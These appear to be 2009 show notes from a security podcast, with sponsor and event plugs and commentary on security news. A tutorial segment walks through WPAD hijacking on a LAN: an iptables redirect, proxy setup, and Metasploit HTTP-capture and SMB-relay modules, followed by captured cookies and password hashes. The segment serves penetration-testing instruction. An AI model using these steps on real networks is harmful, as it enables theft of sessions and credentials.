- Tenable Network Security - This episode sponsored by Tenable network security. Tenable is a developer of enterprise vulnerability, compliance and log management software, but most notably the creators of Nessus, the worlds best vulnerability scanner. Tenable Security Center software extends the power of Nessus through reporting, remediation workflow, IDS event correlation and much more. Tenable also offers a Nessus Professional Feed to detect vulnerabilities in your network today! Tenable – Unified Security Monitoring!
- Core Security - This episode is also sponsored by Core Security Technologies, helping you penetrate your network. Now version 10.0 with WiFi-fu good to go! Rock out with your 'sploit out! Listen to this podcast and qualify to receive a 10% discount on Core Impact, the worlds best penetration testing tool.
- Trustwave Spiderlabs - Trustwave's SpiderLabs - providing advanced information security services to planet Earth. Visit them online at trustwave.com/spiderlabs!
Announcements & Shameless Plugs
Welcome to PaulDotCom Security Weekly, Episode 138 for January 29th, 2009. A show for security professionals and by security professionals who have way too much access to beer. and computers. and maltego.
- Melissa on Twitter AKA @Geekgrrl - Self described "Introvert. Geek. Christian. Wife. Admin. ..." and now contributer to the PaulDotCom Sweeper madness!
- PaulDotCom Upcoming Events - Security webcast galore and the PaulDotCom weekly planner on all PSW events.
- Shmoocon! - new and improved formula with a PaulDotCom booth, live webcast and shmooball target practice! Also, hear Larry and Dave Lauer speak on building Shmooball launchers in Washington DC Feb 6
- HACK NAKED TV - Hack Naked TV! Episode 1 and 2 are out. Look for more goodies here!
- PaulDotCom SANS Click-Through - Go there, register for some of the best training available! Go now or we take the shmooball cannon off of 'stun' mode.
- Register for SANS Security 560: Network Penetration Testing and Ethical Hacking
- SANS Saskatechewan - Larry is teaching the 6 day wireless track (SEC 617) in Regina on March 23 - 28, 2009. Come help keep him warm!
- One Schmoocon ticket donor asked us to mention the SANS class SEC606 - Data and Drive Forensics
- Best Of Webcast Series - Part I - Best Of Network Penetration Testing Tools - Get the slides and listen to the archived presentation here
- Best presentation I've seen all year! - hevnsnt, www.i-hacked.com
Tech segment: WPAD Attacks & Metasploit 3.2 - Part I
WPAD is a feature within Windows that allows the web browser to automatically find the proxy server on the network, and configure it for the local system. It does this in a very interesting way, by looking up the DNS name "wpad.<my domain>.com" and making the following request:
GET /wpad.dat HTTP/1.0
In order to grab these requests you have to register as the NetBIOS name "wpad" and/or register with dhcp (Which in a windows domain will add a DNS entry for you, forward and reverse if enabled, which it usually is). The "wpad.dat" file contains the IP address and port of the proxy server the client should use.
You will need to then redirect everything to an IP address and port that is running a proxy. You can do this in Linux with:
/sbin/iptables -t nat -A PREROUTING -s 192.168.1.0/255.255.255.0 -p tcp -m tcp --dport 80 -j DNAT --to-destination 192.168.1.88
You try using tinyproxy or Squid to redirect the traffic. However, you will want something evil, like Metasploit, to listen on port 80. My original plan was to have my primary IP address listen on port 80 and run Metasploit, then pass the traffic to the proxy so it would go out to the Internet. So I created a secondary IP address to run tinyproxy on port 80:
ifconfig eth0:1 192.168.1.88 netmask 255.255.255.0
Below is tinyproxy config I modified:
Port 80 Listen 192.168.1.88 Allow 192.168.1.0/24
The above works great (sorta), if you only want to snoop on all HTTP traffic, which can be interesting. When you fire up Metasploit, it does not proxy, but give you interesting results:
msf > use auxiliary/server/capture/http msf auxiliary(http) > set FORMSDIR /metasploit/framework-3.2/myhttp/forms msf auxiliary(http) > set SITELIST /metasploit/framework-3.2/myhttp/sites.txt msf auxiliary(http) > set SRVHOST 192.168.1.229 msf auxiliary(http) > set SRVPORT 80 msf auxiliary(http) > set TEMPLATE /metasploit/framework-3.2/myhttp/index.html msf auxiliary(http) > exploit [*] Auxiliary module running as background job [*] Server started.
When you run the above module, it serves the "wpad.dat" to client automagically (its not really magic, I found it in the Ruby code :). In the above, I created custom site lists and forms. This is important for your pen test (most likely) as you will care more about the internal ERP app, and less about grabbing people's Yahoo! logins (because thats easy enough, just ask Sarah Palin). When you start it, you will get stuff like this:
[*] HTTP REQUEST 192.168.1.246 > www.i-hacked.com:80 GET / Windows IE 7.0 cookies=mosvisitor=1; 97e6aefafad7fca1092546ba935d59f1=5390e4fb65942b827cc8221294e0e229; __utma=128795412.1799712433591043600.1233350820.1233350820.1233350820.1; __utmb=1287954184.108.40.2063350820; __utmc=128795412; __utmz=128795412.1233350820.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none) [*] HTTP REQUEST 192.168.1.246 > google.com:80 GET / Windows IE 7.0 cookies=PREF=ID=a65<snip>93fd3f:TM=1233349495:LM=1233349495:S=uu5i7X-pUjk3Iq7L; NID=19=R2E6AOPpdtOd-ngandXg1<snip>DAR5ZvuMHmkM0Wdpq-RTwqlDd3nVhkt7W
To grab the SMB hashes, we need to enable SMB Relay (even though we will not deploy the payload):
msf > use exploit/windows/smb/smb_relay msf exploit(smb_relay) > set SRVHOST 192.168.1.229 msf exploit(smb_relay) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(smb_relay) > exploit [*] Exploit running as background job.
Once that is running, clients will now cough up the LM and NTHASHes:
[*] Received 192.168.1.246:4295 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1 [*] Sending Access Denied to 192.168.1.246:4295 \ [*] Received 192.168.1.246:4297 PAUL-WINDOWS-VM\Administrator LMHASH:faa8<snip>d530d NTHASH:a7a660f836<snip>fd3 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
Note: Its not in the same format as when you run hashdump. See http://blog.metasploit.com/2008/11/ms08-067-metasploit-and-smb-relay.html for more information.
The index.html file that gets sent to each browser will need to contain the following:
Important! Make sure its set to your IP address! Of course, the next step is to get Metasploit working and relaying traffic to the ultimate destination while still being able to do the SMB relay. See part II for more information. Suggestions on how to accomplish this are welcome (I had limited time today).
Stories For Discussion
0wned By Compliance - [PaulDotCom] - Anton goes through some seemingly realistic scenarios as to why/how a merchant can be 0wned, even if PCI compliant. Yes, PCI still has merit as a "Standard", but this does not mean they are secure. I think this is where people go wrong, PCI, in my opinion, just proves that you are doing some stuff in the name of security. This is important when companies want to work together, they can ask, "Are you PCI compliant" and have some sense that they are implementing security. Or are they? Anton points out it depends on who is doing the audit, anyone can walk in and ask "Do you have a firewall?", answer: "yes". Reminds me of a story about a firewall with two holes in it, through which an Ethernet cable was being passed, therefore all traffic was "going through the firewall".
PADJACK, really? - [PaulDotCom] - I hate to rip on companies. I believe in hard work and a free market, and I like to think that in every company there are honest people working their butts off. However, I'm going to go out on a limb here and say, wow this is stupid. My bet, Larry can bypass this in about 5 seconds and gain access to the port. This is just the wrong way to approach the problem. A piece of plastic is not going to stop an attacker, it may slow them down for a few seconds, but does not provide enough security to make it worth while.
Dradis v2 - Larry - Dradis is a tool (linux) used for sharing information across multiple folks on a pen test. Looks pretty cool, and I'm going to check it out. We've talked about using a wiki for this in the past, but it can easily get overwhelmed with disorganized information. Dradis features a nice hierarchical structure that may work for some people..
USB Drive Threat & Solutions - [PaulDotCom] - Its no question, there are threats that USB drives pose to your organization. I like to use the Coke example. Coca Cola has the secret recipe to its famous Coke soda. Its locked away somewhere in the Coke factory. For the purposes of this example, lets say that its on the network somewhere, and not just written down on paper. You can train the users all you like, someone is going to plug something into the computer that could steal the coke recipe, or be used to make a copy of it. The solution? There is software on the market that will limit which devices you can plug into your systems in the domain. I won't mention vendors, you should evaluate all the options and make a decision for your self. The one I tested worked well, provided you were not admin on the machine. The software does limit the USB pen testing scenario we talk about, however to steal something make sure there is no CD-Writer in the machine :)
Zombies ahead! - [Larry] - Nice job to the i-hacked guys. Beware, Zombies! They illustrated how to change the output on those traffic signs on the side of the road, which was incredibly easy to change (go figure, they need to be usable by a diversely educated crowd). I find it amusing that now Texas (and allegedly the country) are "scrambling" to secure these devices. Looks like in the past the default passwords were left, slightly changed, or written inside the boxes. Texas DOT claims the boxes were locked, but how many of us think that it is true? How easily are padlocks bypassed? I think what this really boils down to is the total commitment to apathy on security in other fields...if they didn't want this stuff messed with, you should take steps to make it "un-messable".
Looking forward to these Shmoo talks:
- One Track Mind: Building the 2008 and 2009 ShmooBall Launchers, Larry Pesce and David Lauer
- Building an All-Channel Bluetooth Monitor, Michael Ossmann and Dominic Spill
- Man in the Middling Everything with The Middler, Jay Beale
- Building Wireless Sensor Hardware and Software, Travis Goodspeed and Joshua Gourneau
- Storming the Ivy Tower: How to Hack Your Way into Academia, Sandy Clark (Interesting, I gave a similar presentation a loooong time ago. Go easy, it was a looong time ago and it well, okay it kinda stinks, but some cool stuff in there still, I think).
Best talk title: 802.11 ObgYn or "Spread Your Spectrum", Rick Farina
Youtube and Geotagging - [Larry] - I had the pleasure of chatting with Mark about this one. Mark's been doing some research with google and youtube and the geotagging of the videos. It seems pretty random where the geotageed data comes from, but we're both betting that some folks know how it got there. Marks method is great for taking the youtube ID and tracking it to a location. Mark thinks he might know where a few internet celebrities live. Hello Obama girl!
25 Random Reasons I Won’t Tell You 25 Random Things About Me - [PaulDotCom] - So I read this article earlier in the week, and thought "Wow, thats a wicked stupid idea, why would people put 25 things about themselves online?". Then I got home and my wife was telling me about other people that had done this. She knows better, then said she did one and put all sorts of personal information about us on it. Then I got mad, then she laughed because she was only kidding :) Seriously folks, this is stupid, and furthermore nobody cares. I've been told some people have mentioned their bad password habits in the list! Something like, "I always use the same four numbers based on my birthday for my pin number". WHAAAT!
Damn Vulnerable Linux 1.5 is out! - [Larry] - DVL is a great way to put a system in your lab that you can test against. It has plenty of holes so you're almost guaranteed a successful compromise.
Don't forget the internal threat - [Larry] - This sounds like an almost disastrous situation that was avoided by Fannie Mae. Someone *ahem* needs to look at their employee termination practices, especially with folks that have elevated rights...
Other Stories Of Interest
Six hard drive makers standardize on full disk encryption methods - [mmiller] - This sounds really good. Let's just hope it's AES128 or AES256 instead of XOR or ROT13.